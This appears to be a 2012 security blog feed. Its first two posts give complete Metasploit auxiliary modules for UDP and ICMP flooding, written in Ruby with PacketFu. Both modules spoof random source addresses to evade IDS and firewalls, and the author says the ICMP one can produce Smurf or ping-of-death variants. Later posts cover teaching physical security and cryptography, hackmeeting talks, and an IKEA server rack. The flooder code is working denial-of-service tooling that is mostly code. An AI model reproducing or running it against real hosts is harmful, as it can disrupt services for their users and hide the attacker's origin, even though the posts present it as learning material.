Planet Security

My first Metasploit module: UDP Flooder

2012-01-17T18:55:07+00:00

There are very few Metasploit modules, neither Auxiliaries nor Exploits, VoIP related so I have in mind to write some of them in my free time. Today I want to share a UDP flooder Aux. module, which is very simple but perfect for learning, UDPFlooder is one of the many tools covered in "Hacioking VoIP Exposed" book, considered a reference in this field.

Code:

-------------------------------------------------------------------------

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

include Msf::Auxiliary::Dos

include Msf::Exploit::Capture


 def initialize
  super(
    'Name'   => 'UDP Flooder',
    'Description' => 'A simple UDP flooder',
    'Author'  => 'Jesus Perez',
    'License'      => MSF_LICENSE,
    'Version'  => '$Revision: 0 $'
  )

  register_options(
  [
   Opt::RPORT(5060),
   OptAddress.new('SHOST', [false, 'The spoofable source address (else randomizes)']),
   OptInt.new('SPORT', [false, 'The source port (else randomizes)']),
   OptInt.new('NUM', [false, 'Number of UDP packets to send (else unlimited)']),
   OptInt.new('SIZE', [false, 'Size of UDP packets to send (else 256 bytes)'])
  ], self.class)
  deregister_options('FILTER','PCAPFILE','SNAPLEN')
 end

 def sport
  datastore['SPORT'].to_i.zero? ? rand(65535)+1 : datastore['SPORT'].to_i
 end

 def rport
  datastore['RPORT'].to_i
 end

 def srchost
  datastore['SHOST'] || [rand(0x100000000)].pack('N').unpack('C*').join('.')
 end
 
 def size
  datastore['SIZE'].to_i.zero? ? 256 : datastore['SIZE'].to_i
 end

 def run
  open_pcap

  sent = 0
  num = datastore['NUM']

  print_status("UDP flooding #{rhost}:#{rport}...")

  p = PacketFu::UDPPacket.new

p.ip_daddr = rhost
  p.udp_dport = rport
  
  while (num <= 0) or (sent < num)
   p.ip_ttl = rand(128)+128
   p.ip_saddr = srchost
   p.udp_sport = sport
   p.payload = rand(36**size).to_s(36)
   p.recalc
   capture_sendto(p,rhost)
   sent += 1
  end

  close_pcap
 end
end

--------------------------------------------------------------------------

Most of the code is taken from Metasploit TCP SYN Flooder module but I made some more changes besides adapting it to UDP. The same way TTL is changed in each packet, I prefer to change the source (spoofed) address too because of the same reason (IDS/Firewall evasion). Moreover, in this case something to send is needed so I added the new option SIZE which determines the lenght of this random string. Another different thing you could apprecciate is that option SNAPLEN is unregistered too because of having no sense in this module.

Figure: Usage information

Finally, in order to test if module works fine I´m going to sniff the interface and see, with help of Wireshark, what it´s really happening. Next picture shows that everything seems to be working as defined in the description of the attack. :)

Figures: Sniffed packets

Jesús Pérez

Another simple Metasploit module: ICMP Flooder

2012-01-17T18:54:24+00:00

Hi again!, I said I was going to develope VoIP related Metasploit modules but I was reading PacketFu documentation and I found that wrinting an ICMP flooder couldn´t be too complicated at this point. So I share this code too, I decided to include SHOST and SIZE options too trying to get a more flexible module able to make different flavors of this attack as Ping flood, Smurf or Ping of death. Next pictures show the module in the same way of last post.

Code:

-------------------------------------------------------------------------

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

include Msf::Auxiliary::Dos

include Msf::Exploit::Capture


 def initialize
  super(
    'Name'   => 'ICMP Flooder',
    'Description' => 'A simple ICMP flooder',
    'Author'  => 'Jesus Perez',
    'License'      => MSF_LICENSE,
    'Version'  => '$Revision: 0 $'
  )

  register_options(
  [
   OptAddress.new('SHOST', [false, 'The spoofable source address (else randomizes)']),
   OptInt.new('NUM', [false, 'Number of ping packets to send (else unlimited)']),
   OptInt.new('SIZE', [false, 'Size of ICMP packets to send (else 256 bytes)'])
  ], self.class)
  deregister_options('FILTER','PCAPFILE','SNAPLEN')
 end

 def srchost
  datastore['SHOST'] || [rand(0x100000000)].pack('N').unpack('C*').join('.')
 end

 def size
  datastore['SIZE'].to_i.zero? ? 256 : datastore['SIZE'].to_i
 end

 def run
  open_pcap

  sent = 0
  num = datastore['NUM']

  print_status("ICMP flooding #{rhost}...")

  p = PacketFu::ICMPPacket.new
  p.icmp_type = 8
  p.icmp_code = 0
  p.ip_daddr = rhost

  while (num <= 0) or (sent < num)
   p.ip_saddr = srchost
   p.payload = rand(36**size).to_s(36)
   p.recalc
   capture_sendto(p,rhost)
   sent += 1
  end

  close_pcap
 end
end

-------------------------------------------------------------------------

Figure: Usage information

Figure: Sniffed packets

Jesús Pérez

Physical Security & Criptography at MSWL 2012

2011-12-15T17:14:03+00:00

Great time at Master Software Libre teaching Physical Security and Cryptography contents this year. Two key areas at Information Security and Privacy.

These lessons were the first ones happening before my usual lessons on Networking, Security Networking and Linux Kernel.

On Physical Security time we worked on well-know physical system security methodologies, together with two new relevant topics: environmental design and design and evaluation of physical protection systems.

It was a lesson covering broad and detailed topics; ranging from designing defensible spaces, where you are able to use different elements and aspects to get natural social control and crime prevention, till a full description of technology and sensor availability to protect different facilities. Security standards or some notes to understand social behaviour (The Bronx study case) were worked out too.

On Cryptography, we walked along its history and development in order to understand cryptographic models and current crytographic systems, free/open software tooling, integration and usual use cases. At the end, everybody got their crypto stuff in place, ready to take part in keysigning parties and next social community events.

Ah! I almost forgot. This year, students will elaborate on the right design to build a safe and secure physical protection system for one embassy.

Some posts on Flu-Project blog

2011-11-22T16:13:34+00:00

I recently wrote two posts (in Spanish) on Flu-Project blog about my recent experience in Hackmeeting 2011 (MeigHacks) and some of the issues I treated during my lecture, including W3af and SQLMap. These are the links:

- De paso por el Hackmeeting 2011
- Badstore, SQLi y otras chicas del montón

Jesús Pérez

IKEA Hackers: LackRack

2011-11-19T22:30:15+00:00

Among the hundreds of hacks from the fantastic website IKEA Hackers, one is particularly interesting.

How to build a rack with an IKEA lack table worth less than 10 euros?
Well, with this manual:

The best of the LackRack (after its price) is that its construction is modular and you can grow it with your needs:

The LackRack is the ultimate, low-cost, high shininess solution for your modular datacenter-in-the-living-room. It is said that Google engineers were the first to explore the idea of using lack tables for data centers. The LackRack is so famous that even has its own website: http://lackrack.org/